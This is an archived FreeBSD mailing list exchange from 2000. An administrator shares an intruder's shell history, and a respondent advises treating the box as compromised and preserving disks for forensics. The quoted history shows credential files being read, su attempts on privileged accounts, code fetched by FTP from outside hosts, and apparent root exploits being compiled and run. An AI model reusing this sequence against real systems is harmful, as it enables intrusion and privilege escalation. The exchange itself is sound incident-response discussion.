Date: Mon, 18 Dec 2000 15:47:32 -0500 (EST) From: Tim McMillen <timcm@umich.edu> To: "Gerald T. Freymann" <freymann@eagle.ca> Cc: Questions <questions@FreeBSD.ORG> Subject: Re: Hacker history file - OUCH Message-ID: <Pine.SOL.4.10.10012181521360.17224-100000@tempest.gpcc.itd.umich.edu> In-Reply-To: <NEBBIPHLEDGOAFACJGDDAEBPDHAA.freymann@eagle.ca>
next in thread | previous in thread | raw e-mail | index | archive | help
Do you know for sure it was an intruder? Or was it just one of your users? either way that doesn't look good. I'm no security expert, but the programs they compiled and ran could easily be backdoors to get in easily the next time. It's hard (for me) to tell how bad it is without knowing whether they were successful in getting root priveledges. In the history file we don't see the output of the command. Nothing he did afterwards seems to require root priveledges, but if he had them then those programs could easily be backdoors. I would consider the box compromised. Is it still in use? The best way to get the most information about an attack is to shutdown and halt the machine ASAP. Then mount everything read only (perhaps on another machine. Then look araound. That way you won't overwrite possible clues. Any disk access after the intruder is there can overwrite that, and that is bad for evidence. You may want to contact the administrators at the sites he ftp'd to to alert them and see if they can tell what those files were that he downloaded. Tim On Mon, 18 Dec 2000, Gerald T. Freymann wrote: > > > Seems we have an intruder on one of our boxes... the .history file from the > troubled account follows: > > cd bnc > ls > ./bash > who > cd /etc > more passwd > ps -l > ls -l > more pwd.db > more hosts > pico adduser.conf.bak > pico group > su user > pico group.bak > pico ftpuser > O > pico ftpusers > su toor > su operator > id > pico spwd.db > su wheel > pico passwd > cd /var/tmp > ls -a > cd ... > ls -a > cd .. > ls -l > ls -al > cd ... > ftp copper.he.net > chmod u+x xcon > ./xcon > id > rm * > ls > who > cd /var/tmp > ls -a > ls -al > cd ... > ls -a > ftp cih.edu.mx > ls > cc bsd1 bsd-cron.c > cc -o bsd1 bsd-cron.c > ./bsd1 > id > cc -o bsd2 bsd2.c > ./bsd2 > id > ls > ftp cih.edu.mx > ./bsd sh > ./bsd.sh > chmod u+x bsd.sh > ./bsd.sh > /tmp/sh > id > ls > cc -o bsdsmail bsdsmail.c > ./bsdsmail > ls -a > pico hack > ls > pico user.inf > ls > id > rm * > exit > > Anybody recognize what the intruder has set up? > > -Gerry > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?Pine.SOL.4.10.10012181521360.17224-100000>